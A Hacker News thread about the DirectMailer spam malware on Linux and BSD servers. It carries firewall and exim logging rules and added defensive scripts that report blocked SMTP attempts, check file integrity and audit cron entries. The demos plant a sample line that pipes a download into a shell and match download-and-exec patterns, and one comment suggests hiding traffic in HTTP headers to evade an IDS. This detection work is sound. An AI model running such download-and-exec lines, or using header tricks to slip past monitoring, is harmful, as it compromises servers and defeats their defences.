
Unnoticed for years, malware turned Linux and BSD servers into spamming machines - wglb
http://www.net-security.org/malware_news.php?id=3030
======
ars
You can prevent this kind of thing, or at least make it easier to keep track
of.

Add these rules to your iptables firewall:

    -A OUTPUT -m owner --uid-owner Debian-exim -p tcp --dport 25 -j ACCEPT
    -A OUTPUT -p tcp -d 127.0.0.1 --dport 25 -j ACCEPT
    -A OUTPUT -p tcp --dport 25 -m state --state RELATED,ESTABLISHED -j ACCEPT
    -A OUTPUT -p tcp --dport 25 -j LOG --log-level debug --log-uid --log-prefix "smtp_block "
    -A OUTPUT -p tcp --dport 25 -j REJECT

This blocks anyone except exim from sending email. (Note these rules are not
tested with IPv6.)

Then, keep a log of every outgoing email, by adding in
/etc/exim/exim4.conf.template:

After:

    begin routers

Add:

    traffic_tap:
      driver = accept
      unseen
      no_expn
      no_verify
      transport = local_copy

After:

    begin transports

Add:

    local_copy:
      driver = appendfile
      delivery_date_add
      envelope_to_add
      return_path_add
      maildir_format = true
      create_directory = true
      directory = /var/log/mail_archive/$tod_logfile/

Create /var/log/mail_archive with write access for Debian-exim

Obviously these rules are for exim on Debian, but you can use the ideas for
other systems.
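
An added example, not part of the comment above: the LOG rule in those iptables lines writes "smtp_block " entries to the kernel log, and with --log-uid each entry carries the UID of the process that tried to connect. The POSIX sh/awk function below summarises such lines per UID, resolving names from a passwd file, so the admin sees which local account (a web server user, say) is trying to talk to port 25 behind exim's back. The log lines and the passwd excerpt are constructed samples, not real traffic, and the `smtp_block_report` function name is my own.

```sh
#!/bin/sh
# Added example: summarise "smtp_block " LOG lines written by the iptables
# rules above. Fields (SRC=, DST=, DPT=, UID=) are the standard netfilter LOG
# format; UID= is present because the rule uses --log-uid.

# smtp_block_report PASSWD_FILE < KERNEL_LOG
# Prints one line per offending UID: "<uid> <user> <attempts> <dst1,dst2,...>"
# sorted by UID. Real use: smtp_block_report /etc/passwd < /var/log/kern.log
smtp_block_report() {
    awk -v passwd="$1" '
        BEGIN {                        # uid -> user name map from the passwd file
            while ((getline line < (passwd)) > 0) {
                split(line, f, ":"); name[f[3]] = f[1]
            }
            close(passwd)
        }
        /smtp_block / {
            uid = ""; dst = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^UID=/) uid = substr($i, 5)
                if ($i ~ /^DST=/) dst = substr($i, 5)
            }
            if (uid == "") next        # LOG line without --log-uid data
            count[uid]++
            if (!((uid, dst) in seen)) {
                seen[uid, dst] = 1
                dsts[uid] = (dsts[uid] == "") ? dst : dsts[uid] "," dst
            }
        }
        END {
            for (u in count)
                printf "%s %s %d %s\n", u, ((u in name) ? name[u] : "?"), count[u], dsts[u]
        }' | sort -n
}

# Constructed sample input (not real traffic): three attempts by uid 33
# (www-data on Debian) at 15-minute intervals, one by uid 1000, and one
# unrelated kernel line that must be ignored.
SAMPLE_LOG='May  1 10:00:01 host kernel: [123.4] smtp_block IN= OUT=eth0 SRC=192.0.2.10 DST=203.0.113.25 LEN=60 TTL=64 PROTO=TCP SPT=40001 DPT=25 SYN UID=33 GID=33
May  1 10:15:02 host kernel: [124.9] smtp_block IN= OUT=eth0 SRC=192.0.2.10 DST=203.0.113.26 LEN=60 TTL=64 PROTO=TCP SPT=40002 DPT=25 SYN UID=33 GID=33
May  1 10:30:03 host kernel: [125.1] smtp_block IN= OUT=eth0 SRC=192.0.2.10 DST=203.0.113.25 LEN=60 TTL=64 PROTO=TCP SPT=40003 DPT=25 SYN UID=33 GID=33
May  1 11:00:00 host kernel: [126.0] smtp_block IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.7 LEN=60 TTL=64 PROTO=TCP SPT=40004 DPT=25 SYN UID=1000 GID=1000
May  1 11:00:05 host kernel: [126.5] eth0: link is up'

# Constructed passwd excerpt used instead of /etc/passwd for the demo.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
alice:x:1000:1000:alice:/home/alice:/bin/bash'

# demo_report: run the report over the constructed samples.
demo_report() {
    pw="$(mktemp "${TMPDIR:-/tmp}/passwd.XXXXXX")"
    printf '%s\n' "$SAMPLE_PASSWD" > "$pw"
    printf '%s\n' "$SAMPLE_LOG" | smtp_block_report "$pw"
    rm -f "$pw"
}

demo_report
```

The REJECT rule stops the spam; the report is what turns the LOG rule into an alert. A UID that shows up here and is not exim is a process to go and look at, and the distinct destination list tells you whether it was one misconfigured script or a spam run against many MXes.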

~~~
crypt1d
Not that there is anything particularly wrong with this, but I find it silly
that one should make such customization on their box just to prevent _one_
potential malware hazard. There are a hundred other ways that an infected
machine can be abused, so IMHO prevention should be done based on attack
vectors - that is, stopping the machine from getting infected in the first
place.

~~~
ars
It's not to prevent just one malware. Virtually all malware (on servers) these
days has just one goal: send spam. Plus outbound spam has a very visible and
detrimental impact on your reputation so warrants extra defense.

~~~
verroq
Spam AND DDOS.

------
rsync
Why is the headline "Linux and BSD" servers when the exploit here is some
weird mail software called "DirectMailer" and Joomla/Wordpress?

There's never been any confusion about the risks of installing big monster
bloatware PHP systems on your servers - your eventual owning is a "when, not
if" proposition.

A unix server running "DirectMailer" is like a desktop system running the Ask!
Toolbar. Pure cluelessness.

~~~
ldd
I find these types of headlines very clever: it's click-bait, for sure, but
you and I clicked it because we honestly thought there was some sort of nasty
exploit out there.

Linux is not safe from exploits or hacks but it wants you to be a responsible
adult. You need to update your software frequently, make sure you know what
you are installing and what you are doing.

Ultimately, I think we need to move away from the marketing gimmicks that cry
"ZOMG Z has no viruses and Y has so many and if you get anything it's your OS'
fault" to a "be responsible and reasonable. Your OS is a tool".

------
rurban
Unnoticed? The DarkMailer/YellSOFT DirectMailer spamware has been known for
years. See this post from 2009 on how to fight it:

[https://www.atomicorp.com/forum/viewtopic.php?f=3&t=3352](https://www.atomicorp.com/forum/viewtopic.php?f=3&t=3352)

But thanks for the nice analysis.

------
baudehlo
I wouldn't say unnoticed. Security researchers have known about DM for years.
It's one of the most annoying pieces of malware to convince people they have
because they don't think Linux can be infected.

------
jc22
"We do not know if the paid-for version of DirectMailer also include the
backdoor or not."

I wonder if the paid-for version actually exists or if the whole site is just
a setup for spreading the malware, by getting people to download the
supposedly cracked version. I can't imagine a lot of folks are spending $240
to download spam software from some shady website.

~~~
detaro
Exploit kits, buying access to botnets, ... are a thing, so I wouldn't be
surprised if it is real.

------
Hello71
[https://www.reddit.com/r/technology/comments/34m5d5/unnotice...](https://www.reddit.com/r/technology/comments/34m5d5/unnoticed_for_years_malware_turned_linux_and_bsd/)

top comment:

> If it was unnoticed for years then the sysadmins were shit. Why is this
> newsworthy?
>
> Any sysadmin worth their salt will be monitoring the systems they manage.
> This thing made outgoing connections every 15 minutes using a cron job. Any
> 15 year old can create "malware" like this. If you do not notice this for
> years, you shouldn't be allowed to manage servers.

~~~
sliverstorm
What would your monitoring strategy of choice be to notice these things, for a
small "hobby" server?

I've apprenticed as a junior sysadmin in the past, and I can easily see how a
professional operation would detect or prevent this by design. But a lot of
those methods are more than a little over the top for a one-off, single-user,
low-end VPS.

~~~
noinsight
I agree that this is a problem and I've been researching this for some time
now.

Ideally you would want a HIDS system for small deployments (i.e. a single
server), but there don't seem to be many of those, and there's little
information about them online (as far as I can find). OSSEC is one example,
but I'm not convinced it installs too cleanly. At least FreeBSD has a package
for it, however. Actual configuration would be a mystery.

I think information about this sort of stuff (intrusion detection) seems to be
hard to come by in general. At least stuff that is written by knowledgeable
people. I haven't seen much about it from major vendors either - it seems to
be a black box kind of technology.

I'd love to have a "lightweight" simple daemon that does this. I guess ideally
you would monitor logs for stuff, user and group modifications, cron additions
etc.

~~~
detaro
tripwire, rkhunter, ... are relatively simple options.

And then hope that your configuration prevents the attacker from getting root
or if they do, then they/their automated scripts are not prepared to break
them.

~~~
noinsight
RE: hashing files and whatnot:

FreeBSD with a high enough securelevel allows you to set files append-only or
immutable so that not even root can touch them.

But then updating the index becomes problematic, you would need to create
delta files (which themselves are also immutable) that contain the changed
information and combine the data.

Even then, I'm not convinced you could get that much valuable information from
a full filesystem hash (or whatever) scan. The amount of information would
probably be overwhelming. You would need to apply heuristics or filters.
Checking filetypes with libmagic would work, mostly. You could only alert on
new executables or whatever, etc.
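
An added example, not part of the comments above: the "baseline, then report only deltas and single out new executables" approach the previous two comments discuss, done in POSIX sh and awk without tripwire or OSSEC. `fim_baseline` records kind, SHA-256 and path for every regular file under a directory; `fim_check` recomputes and prints only NEW-EXEC, NEW, CHANGED and REMOVED entries. The function names and the constructed files in the demo are mine; the baseline should live somewhere the attacker cannot rewrite (off-box, or chflags schg under a FreeBSD securelevel as mentioned above), which this script does not do for you.

```sh
#!/bin/sh
# Added example: minimal file-integrity baseline and delta report.
# Baseline format: kind<TAB>sha256<TAB>path, one line per regular file.

_hash_file() {                      # SHA-256 of one file, GNU or BSD userland
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    else shasum -a 256 "$1" | cut -d' ' -f1; fi
}

# fim_baseline DIR -> baseline lines on stdout, sorted by path
fim_baseline() {
    find "$1" -type f -print | LC_ALL=C sort | while read -r f; do
        if [ -x "$f" ]; then kind=exec; else kind=file; fi
        printf '%s\t%s\t%s\n' "$kind" "$(_hash_file "$f")" "$f"
    done
}

# fim_check DIR BASELINE -> one line per delta: "NEW-EXEC|NEW|CHANGED|REMOVED <path>"
fim_check() {
    fim_baseline "$1" | awk -F'\t' -v base="$2" '
        BEGIN {                     # load the old baseline: path -> "kind<TAB>hash"
            while ((getline line < (base)) > 0) {
                split(line, a, "\t"); old[a[3]] = a[1] "\t" a[2]
            }
            close(base)
        }
        {
            p = $3; cur = $1 "\t" $2
            if (!(p in old)) {      # unseen path; executables get their own tag
                tag = ($1 == "exec") ? "NEW-EXEC" : "NEW"
                print tag, p
            } else if (old[p] != cur) {
                print "CHANGED", p  # content or mode changed
            }
            delete old[p]
        }
        END { for (p in old) print "REMOVED", p }' | LC_ALL=C sort
}

# demo_fim: constructed tree, baseline it, then simulate a dropped executable
# and an edited config file, and print the deltas with the temp prefix removed.
demo_fim() {
    root="$(mktemp -d "${TMPDIR:-/tmp}/fim.XXXXXX")"
    mkdir -p "$root/bin" "$root/etc"
    printf 'nameserver 192.0.2.1\n' > "$root/etc/resolv.conf"
    printf '#!/bin/sh\necho ok\n' > "$root/bin/healthcheck"
    chmod 755 "$root/bin/healthcheck"
    fim_baseline "$root" > "$root.baseline"

    printf '#!/bin/sh\ncurl -s http://198.51.100.9/u.php | sh\n' > "$root/bin/.sshd"
    chmod 755 "$root/bin/.sshd"
    printf 'nameserver 198.51.100.9\n' > "$root/etc/resolv.conf"

    fim_check "$root" "$root.baseline" | sed "s|$root/||"
    rm -rf "$root" "$root.baseline"
}

demo_fim
```

Run `fim_baseline /usr/local /etc > baseline` after a clean install, copy the baseline off the box, and run `fim_check` from cron against a fresh copy. On a real system you will want to exclude log and spool directories, which is exactly the filtering the comment above describes; the NEW-EXEC tag is the one worth paging on.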

------
xrstf
My takeaway from this: `Set-Cookie` and `User-Agent` headers are great places
to hide stuff and sneak it by IDS.

------
phillipwills
Quickly check crontabs for all users on your systems:

    cut -d: -f1 /etc/passwd | while read -r user; do sudo crontab -u "$user" -l; done

~~~
LukeShu
Or more simply:

    
    
        sudo grep -r ^ /var/spool/cron
    

(users' crontabs are just /var/spool/cron/$username)
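
An added example, not part of either comment above: listing crontabs is the first step, but the article's malware is recognisable by the shape of its entry (a job every 15 minutes that calls out). The script below walks every place cron reads jobs from on a Debian- or Red Hat-style box (per-user spool, /etc/crontab, /etc/cron.d) and flags entries that run at high frequency, pipe a download into a shell, decode base64, or execute from /tmp, /var/tmp or /dev/shm. The function names, the heuristics and the constructed crontab files in the demo are mine, not the article's.

```sh
#!/bin/sh
# Added example: audit every cron source and flag beacon-shaped entries.

# cron_sources [ROOT] -> paths of all crontab-like files (ROOT prefix is for testing)
cron_sources() {
    root="${1:-}"
    for d in "$root/var/spool/cron/crontabs" "$root/var/spool/cron" "$root/etc/cron.d"; do
        if [ -d "$d" ]; then find "$d" -maxdepth 1 -type f; fi
    done
    if [ -f "$root/etc/crontab" ]; then echo "$root/etc/crontab"; fi
}

# cron_audit [ROOT] -> "file:line: [reasons] entry" for each suspicious job
cron_audit() {
    cron_sources "$1" | while read -r f; do
        awk -v file="$f" '
            /^[[:space:]]*#/ { next }                           # comment
            NF == 0 { next }                                    # blank
            /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }     # VAR=value line
            {
                reasons = ""
                minute = $1                                     # same column in user and system crontabs
                if (minute == "*")
                    reasons = reasons "every-minute "
                else if (minute ~ /^\*\/[0-9]+$/ && substr(minute, 3) + 0 <= 15)
                    reasons = reasons "high-frequency "
                if ($0 ~ /(curl|wget|fetch)[^|]*\|[[:space:]]*(sh|bash|perl|python)/)
                    reasons = reasons "download-and-exec "
                if ($0 ~ /base64[[:space:]]+(-d|--decode)/)
                    reasons = reasons "base64-decode "
                if ($0 ~ /\/(tmp|var\/tmp|dev\/shm)\//)
                    reasons = reasons "runs-from-tmp "
                if (reasons != "") {
                    sub(/ $/, "", reasons)
                    printf "%s:%d: [%s] %s\n", file, NR, reasons, $0
                }
            }' "$f"
    done
}

# demo_cron_audit: constructed crontabs under a temp root; one benign job,
# one beacon-shaped user job, one cron.d job running from /dev/shm.
demo_cron_audit() {
    root="$(mktemp -d "${TMPDIR:-/tmp}/cronaudit.XXXXXX")"
    mkdir -p "$root/var/spool/cron/crontabs" "$root/etc/cron.d"
    printf '# m h dom mon dow command\n0 3 * * * /usr/bin/certbot renew --quiet\n' \
        > "$root/var/spool/cron/crontabs/root"
    printf 'MAILTO=""\n*/15 * * * * curl -s http://198.51.100.9/u.php | sh\n' \
        > "$root/var/spool/cron/crontabs/www-data"
    printf 'SHELL=/bin/sh\n*/10 * * * * root /dev/shm/.x/run >/dev/null 2>&1\n' \
        > "$root/etc/cron.d/sysupdate"
    cron_audit "$root"
    rm -rf "$root"
}

demo_cron_audit
```

Run `sudo sh cron_audit.sh` (or call `cron_audit` with no argument) on a live box. The heuristics are deliberately crude; a legitimate monitoring job will trip "high-frequency", which is fine, since the point is a short list to eyeball rather than a silent verdict. Note that this only catches cron persistence; the at queue, systemd timers and rc scripts need the same treatment.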

------
markbnj
Wow, brilliant. Complete speculation, of course, but it is almost as if the
owners of DirectMailer set out to troll for the trivially corruptible, and
then play them.

------
DominikD
This paper states "BSD" all over the place and only in a small code snippet
reveals it's FreeBSD specifically. I understand this type of simplification
for the purpose of the title but publication itself, which (I'd assume) is
targeted at tech savvy people, should be pretty open about the BSD family
affected.

------
jingo
Relies on DNS.

